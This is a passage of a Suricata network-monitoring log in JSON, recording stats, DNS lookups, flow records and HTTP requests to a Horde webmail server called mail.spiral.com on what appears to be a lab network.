ayer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730,"new_pruned":15,"est_pruned":2357,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21820,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} {"timestamp":"2020-02-29T00:12:09.000294+0000","event_type":"stats","stats":{"uptime":14381,"capture":{"kernel_packets":134905,"kernel_drops":0},"decoder":{"pkts":134906,"bytes":93003072,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134906,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730
,"new_pruned":15,"est_pruned":2359,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21820,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} {"timestamp":"2020-02-29T00:12:09.001834+0000","flow_id":20416851390565,"event_type":"flow","src_ip":"192.168.10.122","src_port":49564,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:08.241765+0000","end":"2020-02-29T00:07:08.350330+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:09.001982+0000","flow_id":782648992382295,"event_type":"flow","src_ip":"192.168.10.122","src_port":48718,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:08.048471+0000","end":"2020-02-29T00:07:08.157035+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:12.000464+0000","flow_id":174022061955973,"event_type":"flow","src_ip":"192.168.10.122","src_port":57163,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:11.433029+0000","end":"2020-02-29T00:07:11.541143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:12:16.000302+0000","event_type":"stats","stats":{"uptime":14388,"capture":{"kernel_packets":134905,"kernel_drops":0},"decoder":{"pkts":134906,"bytes":93003072,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134906,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730,"new_pruned":15,"est_pruned":2362,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20827,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} 
{"timestamp":"2020-02-29T00:12:19.000426+0000","flow_id":1587654728744039,"event_type":"flow","src_ip":"192.168.10.81","src_port":52718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":10,"bytes_toserver":1285,"bytes_toclient":8956,"start":"2020-02-29T00:11:13.392295+0000","end":"2020-02-29T00:11:18.677600+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:20.598346+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54606,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":21578,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:20.707223+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54606,"proto":"UDP","dns":{"type":"answer","id":21578,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:20.707223+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54606,"proto":"UDP","dns":{"type":"answer","id":21578,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:20.796483+0000","flow_id":1144822130078229,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34806,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5607}} {"timestamp":"2020-02-29T00:12:21.000501+0000","flow_id":1599723571538018,"event_type":"flow","src_ip":"192.168.10.122","src_port":58451,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:20.223330+0000","end":"2020-02-29T00:07:20.332082+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:23.000191+0000","event_type":"stats","stats":{"uptime":14395,"capture":{"kernel_packets":134911,"kernel_drops":0},"decoder":{"pkts":134924,"bytes":93010920,"invalid":187,"ipv4":133435,"ipv6":8,"ethernet":134924,"raw":0,"null":0,"sll":0,"tcp":128167,"udp":5066,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2755,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2771,"synack":2762,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1796,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2313,"failed_udp":111},"tx":{"http":4623,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2393}},"flow_mgr":{"closed_pruned":2
731,"new_pruned":15,"est_pruned":2362,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20828,"memcap_state":0,"memcap_global":0},"http":{"memuse":76404,"memcap":0}}} {"timestamp":"2020-02-29T00:12:23.000978+0000","flow_id":1157088548497515,"event_type":"flow","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":35,"bytes_toserver":4407,"bytes_toclient":36375,"start":"2020-02-29T00:10:16.600171+0000","end":"2020-02-29T00:11:22.851541+0000","age":66,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:23.001319+0000","flow_id":110654126986856,"event_type":"flow","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:10:22.824936+0000","end":"2020-02-29T00:11:22.851474+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:12:25.000815+0000","flow_id":1212171508187051,"event_type":"flow","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":14,"bytes_toserver":2320,"bytes_toclient":11299,"start":"2020-02-29T00:11:18.851883+0000","end":"2020-02-29T00:11:24.439161+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:25.801798+0000","flow_id":1144822130078229,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34806,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5607},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20704,"tx_id":0}} {"timestamp":"2020-02-29T00:12:27.645979+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42020,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54334,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:27.754252+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42020,"proto":"UDP","dns":{"type":"answer","id":54334,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:12:27.754252+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42020,"proto":"UDP","dns":{"type":"answer","id":54334,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:27.914566+0000","flow_id":204108328578649,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34808,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6663}} {"timestamp":"2020-02-29T00:12:30.000234+0000","event_type":"stats","stats":{"uptime":14402,"capture":{"kernel_packets":134931,"kernel_drops":0},"decoder":{"pkts":134947,"bytes":93020018,"invalid":187,"ipv4":133456,"ipv6":8,"ethernet":134947,"raw":0,"null":0,"sll":0,"tcp":128186,"udp":5068,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2756,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2772,"synack":2763,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"htt
p":1797,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2314,"failed_udp":111},"tx":{"http":4624,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2394}},"flow_mgr":{"closed_pruned":2734,"new_pruned":15,"est_pruned":2363,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21159,"memcap_state":0,"memcap_global":0},"http":{"memuse":111087,"memcap":0}}} {"timestamp":"2020-02-29T00:12:30.444193+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50814,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50639,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:30.552573+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50814,"proto":"UDP","dns":{"type":"answer","id":50639,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:30.552573+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50814,"proto":"UDP","dns":{"type":"answer","id":50639,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:30.573910+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 
(KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:12:30.573910+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:12:32.000671+0000","flow_id":1771509394621068,"event_type":"flow","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1110,"start":"2020-02-29T00:11:26.508556+0000","end":"2020-02-29T00:11:31.703191+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:12:32.915744+0000","flow_id":204108328578649,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34808,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6663},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31984,"tx_id":0}} {"timestamp":"2020-02-29T00:12:34.485767+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34810,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:12:34.494123+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39806,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:12:34.602655+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56201,"proto":"UDP","dns":{"type":"answer","id":39806,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:34.602655+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56201,"proto":"UDP","dns":{"type":"answer","id":39806,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:34.669166+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:12:34.669166+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":204,"tx_id":1}} {"timestamp":"2020-02-29T00:12:34.681377+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58854,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6800,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:34.789685+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58854,"proto":"UDP","dns":{"type":"answer","id":6800,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:34.789685+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58854,"proto":"UDP","dns":{"type":"answer","id":6800,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:34.913434+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38808,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49577,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:34.923749+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5240}} {"timestamp":"2020-02-29T00:12:35.000171+0000","flow_id":563408108453862,"event_type":"flow","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:11:22.851942+0000","end":"2020-02-29T00:11:34.022594+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:35.000374+0000","flow_id":23852826892732,"event_type":"flow","src_ip":"192.168.10.122","src_port":43605,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:34.399804+0000","end":"2020-02-29T00:07:34.508268+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:35.000459+0000","flow_id":746339340518905,"event_type":"flow","src_ip":"192.168.10.122","src_port":54527,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:34.656889+0000","end":"2020-02-29T00:07:34.764835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:12:35.022032+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38808,"proto":"UDP","dns":{"type":"answer","id":49577,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:35.022032+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38808,"proto":"UDP","dns":{"type":"answer","id":49577,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:35.103290+0000","flow_id":454818455014582,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34812,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 